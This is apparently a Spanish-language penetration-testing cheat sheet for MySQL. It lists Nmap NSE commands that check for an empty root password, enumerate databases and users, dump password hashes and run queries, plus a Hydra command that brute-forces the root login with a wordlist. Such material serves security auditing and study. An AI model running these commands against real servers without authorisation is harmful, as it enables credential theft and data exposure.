MySQL (3306)
MySQL es un sistema de gestión de bases de datos relacional de código abierto. Es ampliamente utilizado para almacenar, gestionar y recuperar datos en diversas aplicaciones, desde sitios web hasta sistemas empresariales. MySQL es conocido por su alta performance, escalabilidad, y confiabilidad. Ofrece soporte para múltiples usuarios y transacciones simultáneas, y utiliza el lenguaje SQL (Structured Query Language) para la gestión de los datos. MySQL es compatible con numerosas plataformas y se integra fácilmente con lenguajes de programación como PHP, Java y Python.
Nmap
Scripts de nmap utiles para este servicio:
mysql-empty-password
mysql-info
mysql-databases
mysql-users
mysql-variables
mysql-dump-hashes
mysql-audit
Comprobar si el password de root es vacío.
root es vacío.nmap --script=mysql-empty-password -p 3306 192.168.1.10nmap --script=mysql-info -p 3306 192.168.1.10Lista las base de datos
nmap --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" -p 3306 192.168.1.10Lista los usuarios de la base de datos
nmap --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" -p 3306 192.168.1.10nmap --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" -p 3306 192.168.1.10Dump hashes
nmap --script=mysql-dump-hashes --script-args="username='root',password=''" -p 3306 192.168.1.10nmap -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" 192.168.1.10 -vvvEjecuta una consulta
nmap -p 3306 --script=mysql-query --script-args="query='select * from books.authors;',username='root',password=''" 192.168.1.10 -vvvHydra
hydra -l root -P /usr/share/metasploit-framework/data/wordlist/unix_passwords.txt mysql://192.168.1.10 mysqlÚltima actualización